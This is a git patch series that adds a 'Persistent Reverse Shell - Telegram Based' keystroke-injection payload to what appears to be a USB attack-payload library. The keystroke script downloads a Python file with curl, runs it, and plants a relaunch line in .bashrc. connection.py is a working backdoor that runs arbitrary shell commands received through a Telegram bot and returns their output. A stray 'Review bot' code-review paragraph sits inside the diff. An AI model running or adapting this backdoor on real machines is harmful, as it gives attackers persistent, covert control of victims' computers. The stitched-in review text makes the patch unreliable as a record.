From cded1692a8b031e6fd6bcfad7a44d22fec688783 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Thu, 3 Aug 2023 10:35:18 +0200
Subject: [PATCH 1/3] Persistent Reverse Shell - Telegram Based
---
 .../payload.txt | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
new file mode 100644
index 000000000..7a268a113
--- /dev/null
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
@@ -0,0 +1,27 @@
+* REM ############################################################
+* REM # #
+* REM # Title : Persistent Reverse Shell - Telegram Based #
+* REM # Author : Aleff #
+* REM # Version : 1.0 #
+* REM # Category : Execution #
+* REM # Target : Linux #
+* REM # #
+* REM ############################################################
+
+* REM Requirements:
+* REM - Internet Connection
+
+QUACK DELAY 1000
+QUACK CTRL-ALT t
+QUACK DELAY 2000
+
+* REM Here you must put your own file link. Replace #PYTHON-SCRIPT-LINK with somethign like this https://www.example.com/connection.py
+QUACK STRING curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then
+QUACK ENTER
+
+QUACK STRING python3 connection.py &
+QUACK ENTER
+
+QUACK STRING fi" >> .bashrc; exit
+QUACK ENTER
+
From c45980c7fda276b9372e730baff7e26585100dca Mon Sep 17 00:00:00 2001
From: aleff-github
Date: Thu, 3 Aug 2023 10:36:19 +0200
Subject: [PATCH 2/3] payload
---
 .../README.md | 41 ++++++++++++++++++
 .../connection.py | 43 +++++++++++++++++++
 2 files changed, 84 insertions(+)
 create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
 create mode 100644 payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
new file mode 100644
index 000000000..ff357e690
--- /dev/null
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
@@ -0,0 +1,41 @@
+# Persistent Reverse Shell - Telegram Based
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+**Category**: Execution
+
+## Dependencies
+
+* Internet Connection
+
+## Description
+
+A script used to configure a persistent reverse shell on a Linux computer trough a pre-configured Telegram Bot.
+
+This payload is based on [Telegram Persistent Connection](Telegram_Persistent_Connection) payload for create the Telegram connection.
+
+The script accept the `/reverse` command using the format `/reverse ` and split `/reverse` from `` trough the `extract_command()` function, then execute the command acquired acquiring the output trough the function `run_command()`.
+
+Because Telegram uses a limited size per message, the script divides the output of the command into a theoretically infinite chunk of 1000 characters in length that will be sent one by one through the Telegram Bot.
+
+## Credits
+
+

Aleff :octocat:

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
\ No newline at end of file
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
new file mode 100644
index 000000000..bcb367760
--- /dev/null
+++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/connection.py
@@ -0,0 +1,43 @@
+from telebot import TeleBot, types
+import subprocess
+
+# Set here the Telegram bot token
+BOT_TOKEN = ""
+bot = TeleBot(BOT_TOKEN)
+
+commands = [
+ types.BotCommand("/reverse", "/reverse ")
+]
+
+bot.set_my_commands(commands=commands)
+
+@bot.message_handler(commands=['reverse'])
+def reverse_shell(message):
+ command = extract_command(message.text)
+ if command != "":
+ print(f"Command received: {command}")
+ out = run_command(command)
+ if len(out) > 1000:
+ bot.reply_to(message, "Message too long...")
+ chunk_size = 1000
+ for i in range(0, len(out), chunk_size):
+ bot.send_message(message.chat.id, out[i:i+chunk_size])
+ else:
+ bot.reply_to(message, out)
+
+def extract_command(message):
+ command_prefix = "/reverse"
+ if message.startswith(command_prefix):
+ return message[len(command_prefix):].strip()
+ else:
+ return None
+
+def run_command(command):
+ try:
+ result = subprocess.check_output(command, shell=True, text=True)
+ return result.strip()
+ except subprocess.CalledProcessError as e:
+ return f"Some error: {e}"
+
+
+bot.infinity_polling()
From 3c909299faabd4cccd01c93732d837b0c6c24226 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Thu, 6 Jun 2024 16:56:08 +0200
Subject: [PATCH 3/3] Adapted to the use of variables [+] Vars [+] ATTACKMODE
---
 .../Persistent_Reverse_Shell-Telegram_Based/README.md | 2 +-
 .../payload.txt | 11 ++++++++---
 2 files changed, 9 insertions(+), 4 deletions(-)
diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md
index ff357e690..8bd1028de 100644
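Review bot: `extract_command` and its caller in `reverse_shell` disagree on the "no command" sentinel: the helper returns `None` when the `/reverse` prefix is absent, while the handler only tests `if command != "":`, so a `None` would pass the guard and reach `subprocess.check_output(None, ...)`, which raises a `TypeError` that nothing in the handler catches (`run_command` handles only `CalledProcessError`). Make the two agree, e.g. `return ""` in the `else` branch of `extract_command` and `if command:` in the handler, so the empty case is handled once. Separately, `from telebot import TeleBot, types` depends on the third-party pyTelegramBotAPI package, which neither this file nor the README's Dependencies section (it lists only "Internet Connection") records; a header comment such as `# Requires the third-party pyTelegramBotAPI package (imported as 'telebot')` would document the assumption where it is made.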
--- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/README.md @@ -20,7 +20,7 @@ Because Telegram uses a limited size per message, the script divides the output ## Credits -

Aleff :octocat:

+

Aleff

diff --git a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt index 7a268a113..3ffd8fcc7 100644 --- a/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt +++ b/payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt @@ -8,20 +8,25 @@ * REM # # * REM ############################################################ +ATTACKMODE HID + * REM Requirements: * REM - Internet Connection +QUACK REM VARIABLES +* REM 1) Here you must put your own file link. +PYTHON-SCRIPT-LINK='https://www.example.com/connection.py' + QUACK DELAY 1000 QUACK CTRL-ALT t QUACK DELAY 2000 -* REM Here you must put your own file link. Replace #PYTHON-SCRIPT-LINK with somethign like this https://www.example.com/connection.py -QUACK STRING curl -o connection.py #PYTHON-SCRIPT-LINK; python3 connection.py; echo "if ! pgrep -f connection.py >/dev/null; then +QUACK STRING curl -o connection.py $PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then QUACK ENTER QUACK STRING python3 connection.py & QUACK ENTER -QUACK STRING fi" >> .bashrc; exit +QUACK STRING fi\" >> .bashrc; exit QUACK ENTER